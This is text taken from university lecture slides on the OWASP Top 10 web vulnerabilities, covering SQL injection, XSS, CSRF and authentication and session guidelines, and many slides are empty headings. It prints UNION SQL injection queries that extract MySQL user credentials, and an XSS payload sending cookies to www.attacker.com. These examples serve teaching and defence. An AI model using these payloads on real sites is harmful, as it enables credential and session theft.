Beruflich Dokumente
Kultur Dokumente
Application Security
Chap2- OWASP Top 10 Web Application Vulnerabilities
Références
OWASP Top 10 Web App Vulneralities.
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
https://www.netsparker.com/blog/web-security
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
1 / 37
Application Security - Course Outline
1 OWASP/WASC
3 Injection
Error Based SQL injection
Tautological Injection
UNION SQL Injection
Blind-Based SQL Injection
Boolean-Based SQL Injection
Time-Based SQL Injection
SQL injection Mitigation/Prevention
User Input Validation
Prepared Statements
4 XSS Cross Site Scripting
Reflected XSS
Stored XSS
DOM-Based XSS
XSS Mitigation/Prevention
7 Other vulnerabilities
OWASP/WASC
There are two main non-profit organizations devoted to the creation,
refinement and promotion of Internet security standards.The projects they
propose include researching, discussing, and publishing information about
Web application security issues:
WASC(Web Application Security Consortium) founded in 2004 by Jeremiah
Grossman and Robert Auger
OWASP(Open Web Application Security Project) founded in 2001 by Mark
Curphey and Dennis Groves
MITRE is a government-funded organization that puts out standards to be used by
the information security community.
CWE "(Common Weakness Enumeration) a community-developed list of
common software security weaknesses not related to a product or system.
https://cwe.mitre.org/
CVE (Common Vulnerabilities and Exposures) a list of entries—each
containing an identification number, a description, and at least one public
reference—for publicly known cybersecurity vulnerabilities related to a
product or a service.https://cve.mitre.org/
CVSS(Common Vulnerabilities Scoring System) A vendor-agnostic industry
open-standard designed to convey vulnerability
severity.http://www.first.org/cvss
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
3 / 37
OWASP top 10 Project
OWASP TOP 10 Project is the de facto application security standard.
The goal is to raise awareness amongst developers and managers. Since
2003, OWASP publish at regular intervals, The Ten Most Critical Web
Application Security Risks.
Source:https://www.owasp.org/images/
7/72/OWASP_Top_10-2017.pdf
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
4 / 37
Injection
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur
when untrusted data is sent to an interpreter as part of a command or
query. The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing data without proper authorization.
OWASP"
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
6 / 37
Error-Based SQL injection- Tautological Injection(2)
In the example below, the tautological injection permits to extract all rows
in Cred SQL Table in JSON format.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
7 / 37
Error-Based SQL injection - UNION SQL injection(1)
UNION-based SQL injection allows to extract information from the
database using the UNION operator. The attacker crafts a SELECT
statement similar to the original query(Same structure of the original table)
guessed through Blind SQL injection techniques. For example, we can
extract MySQL version.
select * from Cred where login=’ nihel’ union Select null,@@version from mysql.user #’
and pass= ”
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
8 / 37
Error-Based SQL injection -UNION SQL injection(2)
Using previousely Blind SQL injection techniques, the attacker gathers
information about the number of columns in the first query and their data
type. For example, Using UNION SQL injection and knowing original SQL
table Structure and the MySQL Database version (In this case 5.7.25 ) ,
the attacker could extract all MySQL users credentials (login,pass) from
the valid table name mysql.user .
select * from Cred where login=’ nihel’ union Select user,authentication_string from
mysql.user #’ and pass= ”
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
9 / 37
Blind SQL injection- Time-Based SQL Injection(1)
Time-Based SQL injection is a type of blind SQL injection. The attacker
gathers information according to the amount of time spent by the database
before returning results.
For example, an attacker can guess each letter of a specified data through
the following way: If the first letter of the login colomn is "n"
(ASCII=110), sleep for 10 seconds.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
10 / 37
Blind SQL injection- Time-Based SQL Injection(2)
As second example, an attacker can guess the version of the
DBMS(Database Management System): If the version starts by 5, sleep for
10 seconds.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
11 / 37
Blind SQL injection- Boolean-Based SQL Injection(2)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
12 / 37
SQL injection Mitigation/Prevention(1)
Many practices (Whitelist/Blacklist approaches)can be used to prevent
SQL injection. Among them:
Input Validation: Validating user’s input from a HTML form.
Input Filtering: Check and sanitize user input. For example, phone numbers
should be filtered to allow only the digits allowed in a phone number. In this
category, we can use functions and library offered by the developpement
framework. For example, in PHP we can use the function filter_var in php’s
filter library and son on. We can also use Regular expressions to matching
patterns in string data. In PHP we can use preg_match function.
Input Escaping: Ensuring that any dangerous characters such as áre not
passed to the SQL statement. Escaping consists on prepending backslash to
special characters. Examples of functions that could be used in PHP:
addslashes, mysql_escape_string, magic quotes,...
Prepared Statement
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
14 / 37
XSS Cross Site Scripting
XSS is a web vulnerability that consists on bypassing the SOP (Same
Origin Policy) concept. SOP is among the most important security
principles in every web browser. It forbids cross-origin content.
For example, the page https://www.banque.com/index.html can access
content from https://www.banque.com/about.html while
https://www.attacker.com/info.php should not access content from
https://www.banque.com/about.html.
There are three main classes of XSS:
Reflected XSS: Happens when the user input from POST data for instance is
reflected on the page without being stored. The attacker can send a crafted link
to the victim, inserting a payload (Recording the user’s current cookie ) and
redirecting to a website controlled by the attacker.
Stored XSS: Happens when the malicious payload is saved ( database,
filesystem..) and then is executed when a user opens the page. For example, The
attacker could place a payload in a forum or social media website, vulnerable to
stored XSS.The payload will be executed each time the victim opens it.
Dom-Based XSS: Appears in the DOM (Document Object Model) instead of part
of the HTML.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
15 / 37
Reflected XSS
<script>document.location=’http://www.attacker.com/hackerget.php?cook=
+ encodeURIComponent(document.cookie)</script>
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
16 / 37
Stored XSS
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
17 / 37
DOM-Based XSS
One of the biggest differ-
ences between DOM-Based
XSS and Reflected or Stored
XSS vulnerabilities is that
DOM-Based XSS cannot be
stopped by server-side fil-
ters. The reason That the vul-
nerability payload is generally
written after the "#" (hash)
of the URL which will never be
sent to the server (In Response
Page).
Many modern browsers like Firefox
version 40 or above, Opera, Safari
and Google Chrome added security
features to fix DOM-Based XSS.
In the example below, we use ex-
plicetly unescape function to de-
code URI and bypass Firefox control
in order to show the attack execu-
tion.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
18 / 37
XSS Mitigation/Prevention(1)
Many practices can be used to
prevent XSS. Among them:
Sanitization: Clean up the
user’s input by removing
irrelevant/dangerous
characters. For example, The
PHP function strip_tag
replaces <script>alert(’hi
name’)</script> by alert(’hi
name’)
Output Encoding: convert
untrusted input into a safe
form where the input is
displayed as data to the user
without executing as code in
the browser. For example,
the use of the PHP function
htmlspecialchars is
recommanded.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
19 / 37
XSS Mitigation/Prevention(2)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
20 / 37
CSRF Cross Site Request Forgery
CSRF also known a Sea Surf is an attack that forces an end users to
execute unwanted actions on a web application in which they’re currently
authenticated (www.bank.tn). Using generally social engineering (such as
sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker’s choosing ( transferring
funds, changing their email address,etc). If the victim is an administrative
account, CSRF can compromise the entire web application.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
21 / 37
CSRF Cross Site Request Forgery
This figures illustrates CSRF scenario.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
22 / 37
CSRF Codes (HTML/PHP pages)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
24 / 37
CSRF Mitigation (HTML/PHP pages)
Successfull Attack
Cookie stored in victim’s browser
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
25 / 37
Broken Authentication and Session Management
vulnerability
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
26 / 37
Authentication General Guidelines(1)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
27 / 37
Authentication General Guidelines(2)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
28 / 37
Authentication General Guidelines(3)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
29 / 37
Authentication General Guidelines(4)
Authentication and Error Messages A web application should
respond in a generic manner. In Authentication phase, incorrect error
messages can be used for the purposes of user ID and password
enumeration. For example, "Login for User Nihel: invalid password"
should be replaced by "Login failed; Invalid userID or password"
Re-authentication for Sensitive Features Using active sessions, an
attacker may be able to execute sensitive transactions through a CSRF
or XSS attack without needing the user’s current credentials. It is
recommended to require another authentication page before updating
sensitive account information.
Enable logging and monitoring of authentication functions In
order to detect attacks / failures on a real time basis, all password and
account failures should be logged and reviewed.
Prevent Brute Force Attacks Password lockout mechanisms. If
more than a predefined number of unsuccessful login attempts are
made, the account shoud be lock out.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
30 / 37
Authentication General Guidelines(5)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
31 / 37
Session Management Vulnerability
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
32 / 37
Session Management Guidelines(1)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
33 / 37
Session Management Guidelines(2)
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
35 / 37
Other Vulnerabilities in OWASP TOP10
(https://www.owasp.org/index.php/Top_10-
2017_Top_10)
Sensitive Data Exposure A web applications and APIs may not protect
sensitive data (password, credit card number, PII) . Generally, that collecting and
processing data should respect privacy laws, e.g. EU’s General Data Protection Regulation
(GDPR), Attackers may use them to conduct credit card fraud, identity theft, or other
crimes. So, data should be classified and controlled, sensitive data encrypted in transit
and at rest. Algotithms and protocols updated , secure key management used...
Broken Access Control A web application may not enforce access controls.
Attackers could act outside of their intended permissions witch lead to unauthorized
information disclosure, modification or destruction of all data, or performing a business
function outside of the limits of the user. So, we should deny by default the access to non
public resources, managing ownerships,Disable web server directory listing , log access
control failure...
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
36 / 37
Other Vulnerabilities in OWASP TOP10
(https://www.owasp.org/index.php/Top_10-
2017_Top_10)
Security Misconfiguration This vulnerability usually caused by insecure default
configurations (OS, frameworks, applications, librairies), incomplete configurations,
misconfigured HTTP headers, and verbose error messages containing sensitive
information. they must be patched/upgraded in a timely fashion. So,we should provide a
repeatable hardening process and a management process including tasks to review and
update the configurations appropriate to all security notes, updates and patches.
Insufficient logging and monitoring If logins, failed logins, suspicious
activity, thresholds and response escalation processes and high-value transactions are not
logged. The application is unable to detect, escalate, or alert for active attacks in real
time or near real time. Most breach studies show time to detect a breach is over 200 days,
typically detected by external parties rather than internal processes or monitoring. So, it is
recommended to Establish effective logging, monitoring and alerting such that suspicious
activities are detected and responded to in a timely fashion and adopt an incident
response and recovery plan such as such as NIST 800-61 rev 2 or later.
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
37 / 37